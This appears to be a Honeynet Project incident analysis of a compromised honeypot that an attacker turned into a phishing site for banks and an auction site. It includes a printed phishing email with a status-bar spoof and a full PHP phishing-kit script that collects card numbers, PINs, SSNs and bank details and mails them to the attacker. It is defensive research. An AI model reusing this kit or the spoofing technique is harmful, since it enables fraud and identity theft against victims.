On November 12, 2004, the Honeynet was connected to the Internet. During the time between the start up and November 22, nothing special happened. We just observed an enormous number of
packets with destination port 445 which is not critical for the installed Honeypot.
At 1:16 am the Honeypot got compromised by exploiting the WU-FTP daemon. There was no port scan or FTP connection before, the first connect was used to hack the computer which is an indication of an autorooter-tool. Such tools are used to scan whole network ranges for vulnerable machines and attack everything they come across. They just deliver their "evil" payload to every system in the given address range. In our case, it was probably a tool called superwu since later on, the attacker used this tool to attack further targets from the Honeypot.
Until 8:21 am there was no activity from the attacker. Probably he started the tool the night before and checked in the morning for successful gained access. As a first step he downloaded a rootkit and installed it on the Honeypot. This script-based rootkit replaces some system binaries with trojaned files:
| /usr/bin/dir | /usr/bin/top | /bin/ps |
| /sbin/ifconfig | /usr/bin/slocate | /usr/bin/pstree |
| /bin/netstat | /usr/bin/vdir | /usr/bin/socklist |
| /usr/bin/strings | /usr/bin/chattr | /usr/sbin/lsof |
In addition, it install an SSH-daemon on port 255 which was used by the attacker to log on the Honeypot in the following. The rootkit uses source code to compile new versions of binary files. These trojaned executables are adjusted to the size of the original files of the target system to "hide" the presence. The rootkit also installs a sniffer to collect login information to other systems. Furthermore, it modifies the init-scripts to ensure that the installed services will start on next reboot and then sends out an information mail about the system status to the attacker. After finishing the installation, the attacker reentered the Honeypot via the additionally installed SSH service using the tool "putty", an SSH-Client for Windows-systems. Afterwards the attacker downloaded a file called spam.tgz. This archive contains some PHP and HTML files. Further examination showed that these files contain web-pages to update the billing profile update for seller accounts of a large Internet auctions website. The attacker copied this files into the document root of the webserver. The "index.html" start page is a forwarding page to the auctions website. The reason for that is that these PHP pages were incomplete. The attacker edited them, but never finished his work on this files. By tracing the IP of the attacker, the source could be located in Romania. A scan of this computer showed no open ports, so this could be the computer of the cracker.
At8:49 am the attacker downloaded another file: psybnc.tgz. After extracting the archive, he installed the included IRC-Bouncer and started an IRC-Session to an "undernet.org" server. The channel he entered was probably used to control hacked systems. A scan of all 8 connected clients showed the same untypical open port 255 with a listening SSH-daemon like the Honeypot had. The attacker also entered another channel and received Operator-rights there. The topic on this channel was a pointer to his personal homepage and the language used in that channel was Romanian.
At6:25 pm the attacker came back and downloaded the file windmilk.tgz. This archive contains the "superwu" autorooter. After extracting the executable binary file, he started the exploiter in a screen-session with a target network as parameter. Then the attacker detached the session and logged off. Later when he came back, he attached the session again to see the results. Since the Honeywall blocked all attacks, no systems could be compromised. The attacker did not realize the intervention, downloaded and installed at 10:40 pm a "socksify" proxy which was configured without any restrictions. With this service anybody could use the Honeypot as a proxy for spreading spam or anonymous connections to any other systems. During the honeynet's online time, it was never used.
On November 23, 2004, the attacker came back at 2:25 pm. He added the user "ro" and installed another rootkit. In a side note we present the recording of this session captured by the snort binary logging.
At 4:40 pm, the attacker downloaded the archive willson.tgz. This file includes already finished webpages similar to the spam.tgz archive. The attacker installed them in the document root directory of the webserver. Now this Honeypot could be used for phishing attacks. By calling the startup page, you get a login page that looks like the original login page. While unrelated to the incident we report, a recent example illustrating the similarity of a phishing data entry form to compare to the acutal site can be found here.
The input of this form will be rudimentary checked with the help of a small PHP-script
For both input fields (username and password), the input must be longer than one character. Note the use of the strings $mesaj and $muie, which suggests a Romanian connection and have been observed in other incidents analysed by members of the UK Honeynet Project. If the input is okay, it will be written to the file /tmp/User.doc and the next page will be shown. On this page, the victim is tricked into entering personal information. All input will be checked and if one is not according to the condition, an error page will be shown. This error page does not attempt to mimic the real error page and most victims would likely become suspicious of the fake web site at this point.
With the help of the following validation script, the data entered into the form is checked. The resulting page of the validation process is not interpreted by the webserver because Apache does not accept .dll files as PHP files by default. The attacker forgot to set the "AddType" variable of the Apache server to interpret .dll files with the PHP-engine. The next activity of the attacker was downloading an archive called banksend.tgz. This file includes a PHP script for sending mails:
After downloading the test.txt file which contained 3719 e-mail addresses, the attacker started sending phishing mails to the recipients listed in this file. The source code of this file shows the real target of the comprised link:
Please follow the link below and renew your account information. <br><br> <a href="http://XXX.XXX.XXX.XXX/Checking/login.php" onClick="popup('http://www.totalmates.com/php/click.cgi?id=xakir')" onMouseOver="window.status='https://internetbanking.bank.com';return true;" onMouseOut="window.status=' ';return true;">https://internetbanking.bank.com</a> <br> <br>
At this point of time we decided to block outgoing TCP ports 25 and 443 so that no victim would suffer from the phishing attacks. The attacker probably noticed that we blocked outgoing connections and concluded that something weird was happening. He never came back and on Decembers 8, 2004, the honeynet went offline for further analysis.
What else did we find?
We found archives which contained pre-packaged pages for other major banks. These pages are used for gathering credit card numbers from the victims. For example, in one case the form input will be checked with the help of JavaScript and the only condition is that the input fields are not blank. The next script sends the data to the attacker:
After this validation, the file processing.html shows just the text: "Thank you, Our update team will verify provided information and you will be contacted". In another bank page, we found the input will not be checked for reasonable values. Instead, it will be just send to the attacker by mail after using the "Save" button. Furthermore, we found a mailer-script for a US bank which works like the mailer-script. It is a simple PHP script that reads e-mail addresses from a separate file and sends the contents of another file. The recipient file includes 83,073 mail addresses.
This side note shows the commands issued by the phisher from the perspective of the attacker. Their actions were reconstructed with the help of the log files generated by Snort and other logged data. The first part of this side note shows a screenshot of the installation process of the rootkit, with a very "user-friendly" interface allowing easy setup. The second part shows the commands issued by the attacker once the rookit was installed, which were again reconstructed with the help of Snort log-files.
Screenshot of the rootkit installation:
[image:../../images/rootkit_screenshot.png size=full]
Commands issued by the attacker:
In this side note we analyse an example script that used to validate the information entered by users into a HTML form on a phishing web site. Initially the input data is checked to ensure that the submitted strings are valid. For example, the PIN should be four characters long and the username should not contain certain words. If the entered data passes this check, the script constructs an e-mail message containing the user's information and sends it to an address at a free e-mail provider. Finally, the location bar of the browser is updated to point to the file xxxxISAPI.dll (the file name has been obfuscated). This page will display a confirmation for the victim. In addition, a script was also included that could be used to transfer the phished information to an FTP server.
//Checking for errors in the post:
//1 - CC nr:
if(strlen($ccnumber)<16){
$error="Invalid credit card number, please re-submit.";
$errchk=1;
}
else if(strlen($ccnumber)>16&&$ccnumber{16}!=' '){
$error="Invalid credit card number, please re-submit.";
$errchk=1;
}
//2 - Email syntax:
else if(strstr($email, '@') == FALSE){
$error="Invalid email address, please re-submit.";
$errchk=2;
}
//3 - Routing number (if it does exist)
else if(strlen($bankr)>0 && strlen($bankr)<9){
$error="Invalid bank routing number, please re-submit.";
$errchk=3;
}
//4 - CVV2 check
else if(strlen($cvv2)!=3&&strlen($cvv2)!=4){
$error="Invalid card validation code, please re-submit.";
$errchk=4;
}
//4 - PIN check
else if(strlen($ccp)!=4&&strlen($ccp)!=4){
$error="Invalid pin number, please re-submit.";
$errchk=4;
}
//5 fields that should exist:
else if(strlen($username)<1){
$error="Please enter your full name and re-submit.";
$errchk=5;
}
else if(strlen($streetaddr)<1){
$error="Please enter your address and re-submit.";
$errchk=5;
}
else if(strlen($cityaddr)<1){
$error="Please enter your city and re-submit.";
$errchk=5;
}
else if(strlen($mmn)<1){
$error="Please enter your Mother Maiden Name and re-submit.";
$errchk=5;
}
else if(strlen($month)<1 || strlen($day)<1 || strlen($year)<1 ){
$error="Please enter your Date Of Birth and re-submit.";
$errchk=5;
}
//6 - Bad words check
else if(stristr($badw,$username)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
else if(stristr($badw,$streetaddr)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
else if(stristr($badw,$cityaddr)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
else if(stristr($badw,$mmn)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
//More coming soon:)
//If no error:
if($errchk==0) {
$efile=fopen("/tmp/User.doc","r");
fscanf($efile,"%s",$userid);
fscanf($efile,"%s",$pass);
fclose($efile);
$timed = date ("l dS of F Y h:i:s A");
$ip = $_SERVER["REMOTE_ADDR"];
$message="----------------------------------------------------------------------------
On $timed the user ($ip) wrote:
CreditCard Number - $ccnumber ; Month - $month ; Day - $day ; Year - $year";
$message=$message."UserId - $userid";
$message=$message."Password - $pass";
$message=$message."Email - $email";
$message=$message."Email Password - $emailp";
$message=$message."Full Name - $username";
$message=$message."Address - $streetaddr";
$message=$message."City - $cityaddr";
$message=$message."State - $stateprovaddr";
$message=$message."Zip Code - $zipcodeaddr";
$message=$message."Phone number - $phone";
$message=$message."Country - $countryaddr";
$message=$message."CVV - $cvv2";
$message=$message."Bank Name - $bank";
$message=$message."Bank Routing # - $bankr
Checking Account # - $bankc
Social Security Number - $ssn
Card PIN Number - $ccp
Mother's Maiden Name - $mmn
Date of Birth - $pibirthdatemm $pibirthdatedd $pibirthdateyy
Driver Licence Number - $dln";
mail ("xxxxxx@hotmail.com","xxEBAYxx","$message","From: tzonfi <xxxxxx@xxxxxx.com>\n");
header ("Location:xxxxISAPI.dll");
//$muie = fopen("/tmp/eb.txt", "a");
//fwrite($muie, $message);
//fclose($muie);
//include("cc-ftp.php");
exit();
}
else {
echo $error;
}
?>
The script cc-ftp.php (commented out in the data processing script above) will transfer the input to an FTP server:
In this side note we provide an overview of the source IP addresses of potential victims in the redirection phishing attack described in phishing technique two. The data below was collected with the help of the compromised German honeypot and modified redir software. Over a period of about 36 hours we observed 721 redirections of inbound HTTP requests to the honeypot, presumably recipients of a spam phishing email who were tricked into accessing the redirected content by clicking on the link provided. All are potential victims of the phishing attack, but as no personal data was captured we we cannot make an educated guess how many people actually entered sensitive information into the HTML form on the Chinese phishing web site.
| Count | Source IP address range |
|---|---|
| 28 | 203.186.X |
| 16 | 80.58.X |
| 13 | 212.138.X |
| 12 | 195.175.X |
| 9 | 61.56.X |
| 9 | 213.42.X |
| 8 | 62.220.X |
| 8 | 200.141.X |
| 8 | 195.229.X |
| 7 | 200.207.X |
| 5 | 200.226.X |
| 5 | 200.171.X |
| 5 | 142.32.X |
| 5 | 133.11.X |
| 4 | 61.19.X |
| 4 | 219.249.X |
| 4 | 203.162.X |
| 4 | 203.113.X |
| 4 | 202.129.X |
| 4 | 201.6.X |
| 4 | 200.204.X |
| 3 | 82.129.X |
| 3 | 66.173.X |
| 3 | 65.214.X |
| 3 | 216.189.X |
| 3 | 212.0.X |
| 3 | 211.248.X |
| 3 | 202.175.X |
| 3 | 200.168.X |
| 3 | 200.153.X |
| 3 | 193.95.X |
| 3 | 193.188.X |
| 3 | 163.28.X |
| 2 | 81.192.X |
| 2 | 81.168.X |
| 2 | 81.116.X |
| 2 | 80.55.X |
| 2 | 80.53.X |
| 2 | 69.56.X |
| 2 | 68.167.X |
| 2 | 67.163.X |
| 2 | 66.6.X |
| 2 | 66.250.X |
| 2 | 66.207.X |
| 2 | 66.135.X |
| 2 | 64.139.X |
| 2 | 63.70.X |
| 2 | 61.220.X |
| 2 | 61.179.X |
| 2 | 61.131.X |
| 2 | 24.106.X |
| 2 | 219.148.X |
| 2 | 218.30.X |
| 2 | 217.166.X |
| 2 | 217.14.X |
| 2 | 216.37.X |
| 2 | 216.244.X |
| 2 | 216.108.X |
| 2 | 213.212.X |
| 2 | 212.165.X |
| 2 | 211.75.X |
| 2 | 210.95.X |
| 2 | 210.212.X |
| 2 | 210.193.X |
| 2 | 210.177.X |
| 2 | 208.59.X |
| 2 | 207.250.X |
| 2 | 203.87.X |
| 2 | 203.75.X |
| 2 | 203.233.X |
| 2 | 203.177.X |
| 2 | 203.154.X |
| 2 | 203.147.X |
| 2 | 202.157.X |
| 2 | 202.138.X |
| 2 | 200.68.X |
| 2 | 200.45.X |
| 2 | 200.247.X |
| 2 | 200.216.X |
| 2 | 200.206.X |
| 2 | 200.161.X |
| 2 | 200.14.X |
| 2 | 196.40.X |
| 2 | 195.92.X |
| 2 | 193.251.X |
| 2 | 168.143.X |
| 2 | 163.27.X |
| 2 | 148.244.X |
| 2 | 148.240.X |
| 2 | 12.154.X |
| 1 | 84.9.X |
| 1 | 84.114.X |
| 1 | 82.67.X |
| 1 | 82.194.X |
| 1 | 82.156.X |
| 1 | 82.144.X |
| 1 | 82.112.X |
| 1 | 82.108.X |
| 1 | 81.86.X |
| 1 | 81.193.X |
| 1 | 81.115.X |
| 1 | 80.65.X |
| 1 | 80.51.X |
| 1 | 80.48.X |
| 1 | 80.235.X |
| 1 | 80.191.X |
| 1 | 80.183.X |
| 1 | 80.178.X |
| 1 | 80.15.X |
| 1 | 80.13.X |
| 1 | 80.132.X |
| 1 | 80.108.X |
| 1 | 69.95.X |
| 1 | 69.8.X |
| 1 | 69.88.X |
| 1 | 69.76.X |
| 1 | 69.50.X |
| 1 | 69.26.X |
| 1 | 69.201.X |
| 1 | 68.9.X |
| 1 | 68.95.X |
| 1 | 68.81.X |
| 1 | 68.60.X |
| 1 | 68.255.X |
| 1 | 68.228.X |
| 1 | 68.169.X |
| 1 | 68.164.X |
| 1 | 68.163.X |
| 1 | 68.161.X |
| 1 | 68.153.X |
| 1 | 68.122.X |
| 1 | 68.120.X |
| 1 | 67.50.X |
| 1 | 67.162.X |
| 1 | 67.132.X |
| 1 | 67.10.X |
| 1 | 67.109.X |
| 1 | 67.101.X |
| 1 | 67.100.X |
| 1 | 66.95.X |
| 1 | 66.93.X |
| 1 | 66.8.X |
| 1 | 66.69.X |
| 1 | 66.56.X |
| 1 | 66.30.X |
| 1 | 66.255.X |
| 1 | 66.23.X |
| 1 | 66.228.X |
| 1 | 66.214.X |
| 1 | 66.201.X |
| 1 | 66.178.X |
| 1 | 66.159.X |
| 1 | 66.150.X |
| 1 | 66.147.X |
| 1 | 66.0.X |
| 1 | 65.75.X |
| 1 | 65.69.X |
| 1 | 65.33.X |
| 1 | 65.202.X |
| 1 | 65.198.X |
| 1 | 65.197.X |
| 1 | 65.166.X |
| 1 | 65.115.X |
| 1 | 65.113.X |
| 1 | 64.84.X |
| 1 | 64.7.X |
| 1 | 64.76.X |
| 1 | 64.5.X |
| 1 | 64.39.X |
| 1 | 64.31.X |
| 1 | 64.2.X |
| 1 | 64.26.X |
| 1 | 64.219.X |
| 1 | 64.217.X |
| 1 | 64.205.X |
| 1 | 64.198.X |
| 1 | 64.173.X |
| 1 | 64.167.X |
| 1 | 64.166.X |
| 1 | 64.145.X |
| 1 | 64.132.X |
| 1 | 64.12.X |
| 1 | 64.114.X |
| 1 | 64.105.X |
| 1 | 63.86.X |
| 1 | 63.245.X |
| 1 | 63.209.X |
| 1 | 63.171.X |
| 1 | 63.169.X |
| 1 | 63.167.X |
| 1 | 63.162.X |
| 1 | 63.145.X |
| 1 | 63.134.X |
| 1 | 62.69.X |
| 1 | 62.39.X |
| 1 | 62.252.X |
| 1 | 62.190.X |
| 1 | 62.103.X |
| 1 | 61.62.X |
| 1 | 61.241.X |
| 1 | 61.236.X |
| 1 | 61.222.X |
| 1 | 61.221.X |
| 1 | 61.219.X |
| 1 | 61.218.X |
| 1 | 61.206.X |
| 1 | 61.197.X |
| 1 | 61.17.X |
| 1 | 61.150.X |
| 1 | 61.145.X |
| 1 | 61.138.X |
| 1 | 4.7.X |
| 1 | 4.79.X |
| 1 | 4.60.X |
| 1 | 4.42.X |
| 1 | 4.239.X |
| 1 | 38.5.X |
| 1 | 38.118.X |
| 1 | 24.74.X |
| 1 | 24.28.X |
| 1 | 24.252.X |
| 1 | 24.242.X |
| 1 | 24.220.X |
| 1 | 24.217.X |
| 1 | 24.209.X |
| 1 | 24.175.X |
| 1 | 24.167.X |
| 1 | 24.140.X |
| 1 | 24.13.X |
| 1 | 24.129.X |
| 1 | 24.11.X |
| 1 | 24.117.X |
| 1 | 24.0.X |
| 1 | 222.51.X |
| 1 | 222.35.X |
| 1 | 222.111.X |
| 1 | 221.2.X |
| 1 | 221.142.X |
| 1 | 220.80.X |
| 1 | 220.65.X |
| 1 | 220.255.X |
| 1 | 220.244.X |
| 1 | 220.172.X |
| 1 | 220.135.X |
| 1 | 220.130.X |
| 1 | 219.93.X |
| 1 | 219.89.X |
| 1 | 219.239.X |
| 1 | 219.166.X |
| 1 | 219.163.X |
| 1 | 219.161.X |
| 1 | 219.147.X |
| 1 | 219.142.X |
| 1 | 219.137.X |
| 1 | 219.133.X |
| 1 | 218.93.X |
| 1 | 218.89.X |
| 1 | 218.76.X |
| 1 | 218.5.X |
| 1 | 218.56.X |
| 1 | 218.188.X |
| 1 | 218.157.X |
| 1 | 218.152.X |
| 1 | 218.145.X |
| 1 | 218.144.X |
| 1 | 218.108.X |
| 1 | 217.95.X |
| 1 | 217.84.X |
| 1 | 217.56.X |
| 1 | 217.33.X |
| 1 | 217.172.X |
| 1 | 217.167.X |
| 1 | 217.136.X |
| 1 | 217.128.X |
| 1 | 216.86.X |
| 1 | 216.77.X |
| 1 | 216.43.X |
| 1 | 216.253.X |
| 1 | 216.250.X |
| 1 | 216.246.X |
| 1 | 216.239.X |
| 1 | 216.221.X |
| 1 | 216.191.X |
| 1 | 216.190.X |
| 1 | 216.185.X |
| 1 | 216.161.X |
| 1 | 216.155.X |
| 1 | 216.154.X |
| 1 | 216.153.X |
| 1 | 216.144.X |
| 1 | 216.139.X |
| 1 | 216.135.X |
| 1 | 216.104.X |
| 1 | 213.81.X |
| 1 | 213.56.X |
| 1 | 213.3.X |
| 1 | 213.229.X |
| 1 | 213.199.X |
| 1 | 213.186.X |
| 1 | 213.172.X |
| 1 | 213.164.X |
| 1 | 213.157.X |
| 1 | 213.132.X |
| 1 | 213.121.X |
| 1 | 212.97.X |
| 1 | 212.95.X |
| 1 | 212.55.X |
| 1 | 212.37.X |
| 1 | 212.182.X |
| 1 | 212.112.X |
| 1 | 211.92.X |
| 1 | 211.72.X |
| 1 | 211.57.X |
| 1 | 211.46.X |
| 1 | 211.38.X |
| 1 | 211.251.X |
| 1 | 211.249.X |
| 1 | 211.241.X |
| 1 | 211.23.X |
| 1 | 211.22.X |
| 1 | 211.21.X |
| 1 | 211.184.X |
| 1 | 211.167.X |
| 1 | 211.114.X |
| 1 | 211.108.X |
| 1 | 210.93.X |
| 1 | 210.90.X |
| 1 | 210.83.X |
| 1 | 210.60.X |
| 1 | 210.249.X |
| 1 | 210.187.X |
| 1 | 210.150.X |
| 1 | 210.138.X |
| 1 | 210.104.X |
| 1 | 210.100.X |
| 1 | 210.0.X |
| 1 | 209.88.X |
| 1 | 209.63.X |
| 1 | 209.58.X |
| 1 | 209.250.X |
| 1 | 209.239.X |
| 1 | 209.232.X |
| 1 | 209.226.X |
| 1 | 209.205.X |
| 1 | 209.204.X |
| 1 | 209.195.X |
| 1 | 209.183.X |
| 1 | 209.173.X |
| 1 | 209.113.X |
| 1 | 208.63.X |
| 1 | 208.62.X |
| 1 | 208.42.X |
| 1 | 208.29.X |
| 1 | 208.232.X |
| 1 | 208.203.X |
| 1 | 208.19.X |
| 1 | 208.191.X |
| 1 | 208.190.X |
| 1 | 208.16.X |
| 1 | 208.153.X |
| 1 | 208.147.X |
| 1 | 207.6.X |
| 1 | 207.69.X |
| 1 | 207.44.X |
| 1 | 207.28.X |
| 1 | 207.233.X |
| 1 | 207.212.X |
| 1 | 207.192.X |
| 1 | 207.177.X |
| 1 | 207.152.X |
| 1 | 207.121.X |
| 1 | 207.109.X |
| 1 | 206.205.X |
| 1 | 206.173.X |
| 1 | 206.163.X |
| 1 | 205.208.X |
| 1 | 205.201.X |
| 1 | 205.188.X |
| 1 | 205.145.X |
| 1 | 204.69.X |
| 1 | 203.59.X |
| 1 | 203.51.X |
| 1 | 203.252.X |
| 1 | 203.208.X |
| 1 | 203.199.X |
| 1 | 203.195.X |
| 1 | 203.185.X |
| 1 | 203.172.X |
| 1 | 203.157.X |
| 1 | 203.151.X |
| 1 | 203.145.X |
| 1 | 203.131.X |
| 1 | 203.130.X |
| 1 | 203.121.X |
| 1 | 203.112.X |
| 1 | 203.10.X |
| 1 | 202.85.X |
| 1 | 202.67.X |
| 1 | 202.5.X |
| 1 | 202.58.X |
| 1 | 202.54.X |
| 1 | 202.47.X |
| 1 | 202.39.X |
| 1 | 202.216.X |
| 1 | 202.213.X |
| 1 | 202.174.X |
| 1 | 202.169.X |
| 1 | 202.162.X |
| 1 | 202.159.X |
| 1 | 202.155.X |
| 1 | 202.14.X |
| 1 | 202.130.X |
| 1 | 202.106.X |
| 1 | 201.3.X |
| 1 | 201.2.X |
| 1 | 201.225.X |
| 1 | 201.129.X |
| 1 | 200.87.X |
| 1 | 200.85.X |
| 1 | 200.59.X |
| 1 | 200.40.X |
| 1 | 200.30.X |
| 1 | 200.253.X |
| 1 | 200.251.X |
| 1 | 200.250.X |
| 1 | 200.228.X |
| 1 | 200.212.X |
| 1 | 200.203.X |
| 1 | 200.201.X |
| 1 | 200.182.X |
| 1 | 200.165.X |
| 1 | 200.163.X |
| 1 | 200.158.X |
| 1 | 200.144.X |
| 1 | 200.12.X |
| 1 | 200.119.X |
| 1 | 200.118.X |
| 1 | 200.114.X |
| 1 | 199.80.X |
| 1 | 199.246.X |
| 1 | 199.243.X |
| 1 | 199.203.X |
| 1 | 199.174.X |
| 1 | 198.81.X |
| 1 | 198.248.X |
| 1 | 198.173.X |
| 1 | 198.165.X |
| 1 | 196.33.X |
| 1 | 195.69.X |
| 1 | 195.68.X |
| 1 | 195.61.X |
| 1 | 195.56.X |
| 1 | 195.39.X |
| 1 | 195.222.X |
| 1 | 195.205.X |
| 1 | 195.117.X |
| 1 | 194.78.X |
| 1 | 194.243.X |
| 1 | 193.253.X |
| 1 | 193.170.X |
| 1 | 192.136.X |
| 1 | 192.115.X |
| 1 | 170.154.X |
| 1 | 168.234.X |
| 1 | 168.209.X |
| 1 | 166.114.X |
| 1 | 165.98.X |
| 1 | 165.21.X |
| 1 | 163.23.X |
| 1 | 163.20.X |
| 1 | 162.6.X |
| 1 | 162.39.X |
| 1 | 159.54.X |
| 1 | 158.130.X |
| 1 | 156.110.X |
| 1 | 155.212.X |
| 1 | 151.99.X |
| 1 | 151.195.X |
| 1 | 149.106.X |
| 1 | 148.223.X |
| 1 | 143.248.X |
| 1 | 142.179.X |
| 1 | 141.158.X |
| 1 | 140.131.X |
| 1 | 138.88.X |
| 1 | 137.204.X |
| 1 | 129.44.X |
| 1 | 128.200.X |
| 1 | 12.42.X |
| 1 | 12.176.X |
| 1 | 12.160.X |
| 1 | 12.147.X |
| 1 | 12.101.X |